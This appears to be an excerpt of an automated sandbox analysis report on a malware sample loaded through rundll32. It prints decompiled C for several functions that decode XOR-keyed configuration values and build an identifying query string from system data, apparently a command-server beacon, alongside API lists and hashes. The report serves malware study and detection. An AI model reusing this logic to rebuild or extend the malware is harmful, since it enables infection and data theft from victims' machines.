                                                    • Part of subcall function 04F412D4: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 04F41321
                                                    • Part of subcall function 04F412D4: memset.NTDLL ref: 04F4133B
                                                    • Part of subcall function 04F412D4: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04F41379
                                                    • Part of subcall function 04F412D4: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04F4138D
                                                    • Part of subcall function 04F412D4: FindCloseChangeNotification.KERNELBASE(00000000), ref: 04F413A4
                                                    • Part of subcall function 04F412D4: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04F413B0
                                                    • Part of subcall function 04F412D4: lstrcat.KERNEL32(?,642E2A5C), ref: 04F413F1
                                                    • Part of subcall function 04F412D4: FindFirstFileA.KERNELBASE(?,?), ref: 04F41407
                                                    • Part of subcall function 04F4809F: lstrlen.KERNEL32(?,00000000,04F4D330,00000001,04F42200,04F4D00C,04F4D00C,00000000,00000005,00000000,00000000,?,?,?,04F496C1,04F423E9), ref: 04F480A8
                                                    • Part of subcall function 04F4809F: mbstowcs.NTDLL ref: 04F480CF
                                                    • Part of subcall function 04F4809F: memset.NTDLL ref: 04F480E1
                                                  • HeapFree.KERNEL32(00000000,04F4D00C,04F4D00C,04F4D00C,00000000,00000005,00000000,00000000,?,?,?,04F496C1,04F423E9,04F4D00C,?,04F423E9), ref: 04F4221C
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                  • String ID:
                                                  • API String ID: 983081259-0
                                                  • Opcode ID: 64ac5f233fc09e8e6178690117fe462bd56bebba47d3a88227eede4ec57b2bc3
                                                  • Instruction ID: 7634ace704a28c63c29738241ff956716159ee43b14a1d897065ad95c151542e
                                                  • Opcode Fuzzy Hash: 64ac5f233fc09e8e6178690117fe462bd56bebba47d3a88227eede4ec57b2bc3
                                                  • Instruction Fuzzy Hash: 5C01B53A700204AAF7006EEADC80B7A7E99EBD53E4F5204B5B945D6050DE69BE839620
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 04F44094, Relevance: 9.2, APIs: 6, Instructions: 223memoryCOMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E04F44094(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t46;
				intOrPtr _t49;
				signed int _t50;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t85;
				intOrPtr _t102;

				_t86 = __ecx;
				_t20 =  *0x4f4d278; // 0x63699bc3
				if(E04F48748( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0x4f4d2d4 = _v12;
				}
				_t25 =  *0x4f4d278; // 0x63699bc3
				if(E04F48748( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L60;
				} else {
					_t85 = _v12;
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						_t80 =  *0x4f4d278; // 0x63699bc3
						_t31 = E04F43F7C(_t86, _t85, _t80 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x4f4d240 = _v8;
						}
					}
					if(_t85 == 0) {
						_t32 = 0;
					} else {
						_t76 =  *0x4f4d278; // 0x63699bc3
						_t32 = E04F43F7C(_t86, _t85, _t76 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x4f4d244 = _v8;
						}
					}
					if(_t85 == 0) {
						_t33 = 0;
					} else {
						_t72 =  *0x4f4d278; // 0x63699bc3
						_t33 = E04F43F7C(_t86, _t85, _t72 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x4f4d248 = _v8;
						}
					}
					if(_t85 == 0) {
						_t34 = 0;
					} else {
						_t68 =  *0x4f4d278; // 0x63699bc3
						_t34 = E04F43F7C(_t86, _t85, _t68 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0x4f4d004 = _v8;
						}
					}
					if(_t85 == 0) {
						_t35 = 0;
					} else {
						_t64 =  *0x4f4d278; // 0x63699bc3
						_t35 = E04F43F7C(_t86, _t85, _t64 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0x4f4d02c = _v8;
						}
					}
					if(_t85 == 0) {
						_t36 = 0;
					} else {
						_t60 =  *0x4f4d278; // 0x63699bc3
						_t36 = E04F43F7C(_t86, _t85, _t60 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t57 = 0x10;
						_t58 = E04F46ED2(_t57);
						if(_t58 != 0) {
							_push(_t58);
							E04F4A5D6();
						}
					}
					if(_t85 == 0) {
						_t37 = 0;
					} else {
						_t55 =  *0x4f4d278; // 0x63699bc3
						_t37 = E04F43F7C(_t86, _t85, _t55 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E04F46ED2(0, _t37) != 0) {
						_t102 =  *0x4f4d32c; // 0x70795b0
						E04F475E9(_t102 + 4, _t53);
					}
					if(_t85 == 0) {
						_t38 = 0;
					} else {
						_t50 =  *0x4f4d278; // 0x63699bc3
						_t38 = E04F43F7C(_t86, _t85, _t50 ^ 0x372ab5b7);
					}
					if(_t38 == 0) {
						L51:
						_t39 =  *0x4f4d27c; // 0x212a5a8
						_t18 = _t39 + 0x4f4e252; // 0x616d692f
						 *0x4f4d2d0 = _t18;
						goto L52;
					} else {
						_t49 = E04F46ED2(0, _t38);
						 *0x4f4d2d0 = _t49;
						if(_t49 != 0) {
							L52:
							if(_t85 == 0) {
								_t41 = 0;
							} else {
								_t46 =  *0x4f4d278; // 0x63699bc3
								_t41 = E04F43F7C(_t86, _t85, _t46 ^ 0xd8dc5cde);
							}
							if(_t41 == 0) {
								_t42 =  *0x4f4d27c; // 0x212a5a8
								_t19 = _t42 + 0x4f4e791; // 0x6976612e
								_t43 = _t19;
							} else {
								_t43 = E04F46ED2(0, _t41);
							}
							 *0x4f4d340 = _t43;
							HeapFree( *0x4f4d238, 0, _t85);
							L60:
							return 0;
						}
						goto L51;
					}
				}
			}


































                                                  0x04f44094
                                                  0x04f44097
                                                  0x04f440b7
                                                  0x04f440c5
                                                  0x04f440c5
                                                  0x04f440ca
                                                  0x04f440e4
                                                  0x04f442e2
                                                  0x04f442e4
                                                  0x00000000
                                                  0x04f440ea
                                                  0x04f440ea
                                                  0x04f440f1
                                                  0x04f44107
                                                  0x04f440f3
                                                  0x04f440f3
                                                  0x04f44100
                                                  0x04f44100
                                                  0x04f44111
                                                  0x04f44113
                                                  0x04f4411d
                                                  0x04f44122
                                                  0x04f44122
                                                  0x04f4411d
                                                  0x04f44129
                                                  0x04f4413f
                                                  0x04f4412b
                                                  0x04f4412b
                                                  0x04f44138
                                                  0x04f44138
                                                  0x04f44143
                                                  0x04f44145
                                                  0x04f4414f
                                                  0x04f44154
                                                  0x04f44154
                                                  0x04f4414f
                                                  0x04f4415b
                                                  0x04f44171
                                                  0x04f4415d
                                                  0x04f4415d
                                                  0x04f4416a
                                                  0x04f4416a
                                                  0x04f44175
                                                  0x04f44177
                                                  0x04f44181
                                                  0x04f44186
                                                  0x04f44186
                                                  0x04f44181
                                                  0x04f4418d
                                                  0x04f441a3
                                                  0x04f4418f
                                                  0x04f4418f
                                                  0x04f4419c
                                                  0x04f4419c
                                                  0x04f441a7
                                                  0x04f441a9
                                                  0x04f441b3
                                                  0x04f441b8
                                                  0x04f441b8
                                                  0x04f441b3
                                                  0x04f441bf
                                                  0x04f441d5
                                                  0x04f441c1
                                                  0x04f441c1
                                                  0x04f441ce
                                                  0x04f441ce
                                                  0x04f441d9
                                                  0x04f441db
                                                  0x04f441e5
                                                  0x04f441ea
                                                  0x04f441ea
                                                  0x04f441e5
                                                  0x04f441f1
                                                  0x04f44207
                                                  0x04f441f3
                                                  0x04f441f3
                                                  0x04f44200
                                                  0x04f44200
                                                  0x04f4420b
                                                  0x04f4420d
                                                  0x04f44210
                                                  0x04f44211
                                                  0x04f44218
                                                  0x04f4421a
                                                  0x04f4421b
                                                  0x04f4421b
                                                  0x04f44218
                                                  0x04f44222
                                                  0x04f44238
                                                  0x04f44224
                                                  0x04f44224
                                                  0x04f44231
                                                  0x04f44231
                                                  0x04f4423c
                                                  0x04f4424a
                                                  0x04f44254
                                                  0x04f44254
                                                  0x04f4425b
                                                  0x04f44271
                                                  0x04f4425d
                                                  0x04f4425d
                                                  0x04f4426a
                                                  0x04f4426a
                                                  0x04f44275
                                                  0x04f44288
                                                  0x04f44288
                                                  0x04f4428d
                                                  0x04f44293
                                                  0x00000000
                                                  0x04f44277
                                                  0x04f4427a
                                                  0x04f44281
                                                  0x04f44286
                                                  0x04f44298
                                                  0x04f4429a
                                                  0x04f442b0
                                                  0x04f4429c
                                                  0x04f4429c
                                                  0x04f442a9
                                                  0x04f442a9
                                                  0x04f442b4
                                                  0x04f442c0
                                                  0x04f442c5
                                                  0x04f442c5
                                                  0x04f442b6
                                                  0x04f442b9
                                                  0x04f442b9
                                                  0x04f442d3
                                                  0x04f442d8
                                                  0x04f442e5
                                                  0x04f442e9
                                                  0x04f442e9
                                                  0x00000000
                                                  0x04f44286
                                                  0x04f44275

                                                  APIs
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04F423DE,?,63699BC3,04F423DE,?,63699BC3,00000005,04F4D00C,00000008,?,04F423DE), ref: 04F44119
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04F423DE,?,63699BC3,04F423DE,?,63699BC3,00000005,04F4D00C,00000008,?,04F423DE), ref: 04F4414B
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04F423DE,?,63699BC3,04F423DE,?,63699BC3,00000005,04F4D00C,00000008,?,04F423DE), ref: 04F4417D
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04F423DE,?,63699BC3,04F423DE,?,63699BC3,00000005,04F4D00C,00000008,?,04F423DE), ref: 04F441AF
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04F423DE,?,63699BC3,04F423DE,?,63699BC3,00000005,04F4D00C,00000008,?,04F423DE), ref: 04F441E1
                                                  • HeapFree.KERNEL32(00000000,04F423DE,04F423DE,?,63699BC3,04F423DE,?,63699BC3,00000005,04F4D00C,00000008,?,04F423DE), ref: 04F442D8
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: a6cead453c63d3129656d5149d37376890ebac156c247ae0bbce3a0e6dc1223a
                                                  • Instruction ID: f504315500ea7906fe04484d05a697e8b098770afd6bddbad1e3616ac2c6fdf6
                                                  • Opcode Fuzzy Hash: a6cead453c63d3129656d5149d37376890ebac156c247ae0bbce3a0e6dc1223a
                                                  • Instruction Fuzzy Hash: 6F6156B9B10118ABEB11EBB4EC84E5B7FE9EBD87507244915E501E7504FF38FA428724
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F4A279, Relevance: 34.7, APIs: 23, Instructions: 201memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 66%
                                                  			E04F4A279(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x4f4d018; // 0xf56cfa1f
				asm("bswap eax");
				_t27 =  *0x4f4d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x4f4d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x4f4d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t30 =  *0x4f4d27c; // 0x212a5a8
				_t3 = _t30 + 0x4f4e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d14b, _t29, _t28, _t27, _t26,  *0x4f4d02c,  *0x4f4d004, _t25);
				_t33 = E04F41C1A();
				_t34 =  *0x4f4d27c; // 0x212a5a8
				_t4 = _t34 + 0x4f4e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E04F454BC(_t91);
				if(_t96 != 0) {
					_t83 =  *0x4f4d27c; // 0x212a5a8
					_t6 = _t83 + 0x4f4e8eb; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x4f4d238, 0, _t96);
				}
				_t97 = E04F47649();
				if(_t97 != 0) {
					_t78 =  *0x4f4d27c; // 0x212a5a8
					_t8 = _t78 + 0x4f4e8f3; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x4f4d238, 0, _t97);
				}
				_t98 =  *0x4f4d32c; // 0x70795b0
				_a32 = E04F49395(0x4f4d00a, _t98 + 4);
				_t42 =  *0x4f4d2cc; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x4f4d27c; // 0x212a5a8
					_t11 = _t74 + 0x4f4e8cd; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x4f4d2c8; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x4f4d27c; // 0x212a5a8
					_t13 = _t71 + 0x4f4e8c6; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x4f4d238, 0, 0x800);
					if(_t100 != 0) {
						E04F47A80(GetTickCount());
						_t50 =  *0x4f4d32c; // 0x70795b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x4f4d32c; // 0x70795b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x4f4d32c; // 0x70795b0
						_t103 = E04F48307(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x4f4c2ac);
							_push(_t103);
							_t62 = E04F43CC8();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E04F41199(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E04F4A1B0();
								}
								HeapFree( *0x4f4d238, 0, _v44);
							}
							HeapFree( *0x4f4d238, 0, _t103);
						}
						HeapFree( *0x4f4d238, 0, _t100);
					}
					HeapFree( *0x4f4d238, 0, _a24);
				}
				HeapFree( *0x4f4d238, 0, _t105);
				return _a12;
			}
















































                                                  0x04f4a279
                                                  0x04f4a279
                                                  0x04f4a279
                                                  0x04f4a280
                                                  0x04f4a286
                                                  0x04f4a28e
                                                  0x04f4a290
                                                  0x04f4a290
                                                  0x04f4a29d
                                                  0x04f4a2a8
                                                  0x04f4a2ab
                                                  0x04f4a2b6
                                                  0x04f4a2b9
                                                  0x04f4a2be
                                                  0x04f4a2c1
                                                  0x04f4a2c6
                                                  0x04f4a2c9
                                                  0x04f4a2d5
                                                  0x04f4a2e2
                                                  0x04f4a2e4
                                                  0x04f4a2ea
                                                  0x04f4a2ef
                                                  0x04f4a2fa
                                                  0x04f4a2fc
                                                  0x04f4a2ff
                                                  0x04f4a306
                                                  0x04f4a30a
                                                  0x04f4a30c
                                                  0x04f4a311
                                                  0x04f4a31d
                                                  0x04f4a31f
                                                  0x04f4a32b
                                                  0x04f4a32d
                                                  0x04f4a32d
                                                  0x04f4a338
                                                  0x04f4a33c
                                                  0x04f4a33e
                                                  0x04f4a343
                                                  0x04f4a34f
                                                  0x04f4a351
                                                  0x04f4a35d
                                                  0x04f4a35f
                                                  0x04f4a35f
                                                  0x04f4a365
                                                  0x04f4a378
                                                  0x04f4a37c
                                                  0x04f4a383
                                                  0x04f4a386
                                                  0x04f4a38b
                                                  0x04f4a396
                                                  0x04f4a398
                                                  0x04f4a39b
                                                  0x04f4a39b
                                                  0x04f4a39d
                                                  0x04f4a3a4
                                                  0x04f4a3a7
                                                  0x04f4a3ac
                                                  0x04f4a3b6
                                                  0x04f4a3b8
                                                  0x04f4a3c0
                                                  0x04f4a3d9
                                                  0x04f4a3dd
                                                  0x04f4a3e9
                                                  0x04f4a3ee
                                                  0x04f4a3f7
                                                  0x04f4a408
                                                  0x04f4a40c
                                                  0x04f4a415
                                                  0x04f4a41b
                                                  0x04f4a428
                                                  0x04f4a435
                                                  0x04f4a43b
                                                  0x04f4a447
                                                  0x04f4a44d
                                                  0x04f4a44e
                                                  0x04f4a455
                                                  0x04f4a459
                                                  0x04f4a45f
                                                  0x04f4a466
                                                  0x04f4a46d
                                                  0x04f4a473
                                                  0x04f4a47a
                                                  0x04f4a47e
                                                  0x04f4a489
                                                  0x04f4a490
                                                  0x04f4a494
                                                  0x04f4a49d
                                                  0x04f4a49d
                                                  0x04f4a4ae
                                                  0x04f4a4ae
                                                  0x04f4a4bd
                                                  0x04f4a4bd
                                                  0x04f4a4cc
                                                  0x04f4a4cc
                                                  0x04f4a4de
                                                  0x04f4a4de
                                                  0x04f4a4ed
                                                  0x04f4a4fe

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 04F4A290
                                                  • wsprintfA.USER32 ref: 04F4A2DD
                                                  • wsprintfA.USER32 ref: 04F4A2FA
                                                  • wsprintfA.USER32 ref: 04F4A31D
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04F4A32D
                                                  • wsprintfA.USER32 ref: 04F4A34F
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04F4A35F
                                                  • wsprintfA.USER32 ref: 04F4A396
                                                  • wsprintfA.USER32 ref: 04F4A3B6
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F4A3D3
                                                  • GetTickCount.KERNEL32 ref: 04F4A3E3
                                                  • RtlEnterCriticalSection.NTDLL(07079570), ref: 04F4A3F7
                                                  • RtlLeaveCriticalSection.NTDLL(07079570), ref: 04F4A415
                                                    • Part of subcall function 04F48307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04F4A428,?,070795B0), ref: 04F48332
                                                    • Part of subcall function 04F48307: lstrlen.KERNEL32(?,?,?,04F4A428,?,070795B0), ref: 04F4833A
                                                    • Part of subcall function 04F48307: strcpy.NTDLL ref: 04F48351
                                                    • Part of subcall function 04F48307: lstrcat.KERNEL32(00000000,?), ref: 04F4835C
                                                    • Part of subcall function 04F48307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04F4A428,?,070795B0), ref: 04F48379
                                                  • StrTrimA.SHLWAPI(00000000,04F4C2AC,?,070795B0), ref: 04F4A447
                                                    • Part of subcall function 04F43CC8: lstrlen.KERNEL32(070787FA,00000000,00000000,74ECC740,04F4A453,00000000), ref: 04F43CD8
                                                    • Part of subcall function 04F43CC8: lstrlen.KERNEL32(?), ref: 04F43CE0
                                                    • Part of subcall function 04F43CC8: lstrcpy.KERNEL32(00000000,070787FA), ref: 04F43CF4
                                                    • Part of subcall function 04F43CC8: lstrcat.KERNEL32(00000000,?), ref: 04F43CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 04F4A466
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 04F4A46D
                                                  • lstrcat.KERNEL32(00000000,?), ref: 04F4A47A
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 04F4A47E
                                                    • Part of subcall function 04F41199: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 04F4124B
                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04F4A4AE
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04F4A4BD
                                                  • HeapFree.KERNEL32(00000000,00000000,?,070795B0), ref: 04F4A4CC
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04F4A4DE
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04F4A4ED
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                  • String ID:
                                                  • API String ID: 3080378247-0
                                                  • Opcode ID: c5274f17db1b0b6b40ca90f805d31651c98133f686a95a4d54de101c3b2533b6
                                                  • Instruction ID: 9d0441d289211f3edd0bf60ea3efc907944024605bf13f3257e64d30072f7e31
                                                  • Opcode Fuzzy Hash: c5274f17db1b0b6b40ca90f805d31651c98133f686a95a4d54de101c3b2533b6
                                                  • Instruction Fuzzy Hash: 9561AB79901208AFE7219B68FC48F6A7BE8EBD8714F064114F908D7260DF3DED069B65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F48B94, Relevance: 33.2, APIs: 22, Instructions: 245memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E04F48B94(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t101;
				signed int _t105;
				char** _t107;
				int _t110;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t119;
				intOrPtr _t122;
				intOrPtr _t127;
				int _t131;
				CHAR* _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t144;
				int _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t149;
				long _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				void* _t159;
				void* _t161;

				_t144 = __edx;
				_t135 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x4f4d018; // 0xf56cfa1f
				asm("bswap eax");
				_t61 =  *0x4f4d014; // 0x3a87c8cd
				_t133 = _a16;
				asm("bswap eax");
				_t62 =  *0x4f4d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x4f4d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t64 =  *0x4f4d27c; // 0x212a5a8
				_t3 = _t64 + 0x4f4e633; // 0x74666f73
				_t145 = wsprintfA(_t133, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x4f4d02c,  *0x4f4d004, _t59);
				_t67 = E04F41C1A();
				_t68 =  *0x4f4d27c; // 0x212a5a8
				_t4 = _t68 + 0x4f4e673; // 0x74707526
				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
				_t161 = _t159 + 0x38;
				_t146 = _t145 + _t71;
				_t72 = E04F454BC(_t135);
				_t134 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t127 =  *0x4f4d27c; // 0x212a5a8
					_t7 = _t127 + 0x4f4e8eb; // 0x736e6426
					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
					_t161 = _t161 + 0xc;
					_t146 = _t146 + _t131;
					HeapFree( *0x4f4d238, 0, _v8);
				}
				_t73 = E04F47649();
				_v8 = _t73;
				if(_t73 != 0) {
					_t122 =  *0x4f4d27c; // 0x212a5a8
					_t11 = _t122 + 0x4f4e8f3; // 0x6f687726
					wsprintfA(_t146 + _a16, _t11, _t73);
					_t161 = _t161 + 0xc;
					HeapFree( *0x4f4d238, 0, _v8);
				}
				_t147 =  *0x4f4d32c; // 0x70795b0
				_t75 = E04F49395(0x4f4d00a, _t147 + 4);
				_t153 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x4f4d238, _t153, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x4f4d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x4f4d238, _t153, _v20);
						goto L26;
					}
					E04F47A80(GetTickCount());
					_t82 =  *0x4f4d32c; // 0x70795b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x4f4d32c; // 0x70795b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x4f4d32c; // 0x70795b0
					_t149 = E04F48307(1, _t144, _a16,  *_t88);
					_v28 = _t149;
					asm("lock xadd [eax], ecx");
					if(_t149 == 0) {
						L24:
						HeapFree( *0x4f4d238, _t153, _v8);
						goto L25;
					}
					StrTrimA(_t149, 0x4f4c2ac);
					_push(_t149);
					_t94 = E04F43CC8();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x4f4d238, _t153, _t149);
						goto L24;
					}
					_t154 = __imp__;
					 *_t154(_t149, _a4);
					 *_t154(_v8, _v20);
					_t155 = __imp__;
					 *_t155(_v8, _v16);
					 *_t155(_v8, _t149);
					_t101 = E04F4809F(0, _v8);
					_a4 = _t101;
					if(_t101 == 0) {
						_v12 = 8;
						L21:
						E04F4A1B0();
						L22:
						HeapFree( *0x4f4d238, 0, _v16);
						_t153 = 0;
						goto L23;
					}
					_t105 = E04F443DF(_t134, 0xffffffffffffffff, _t149,  &_v24);
					_v12 = _t105;
					if(_t105 == 0) {
						_t158 = _v24;
						_v12 = E04F4163F(_t158, _a4, _a8, _a12);
						_t113 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
						_t115 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t115 + 8))(_t115);
						_t117 =  *((intOrPtr*)(_t158 + 4));
						 *((intOrPtr*)( *_t117 + 8))(_t117);
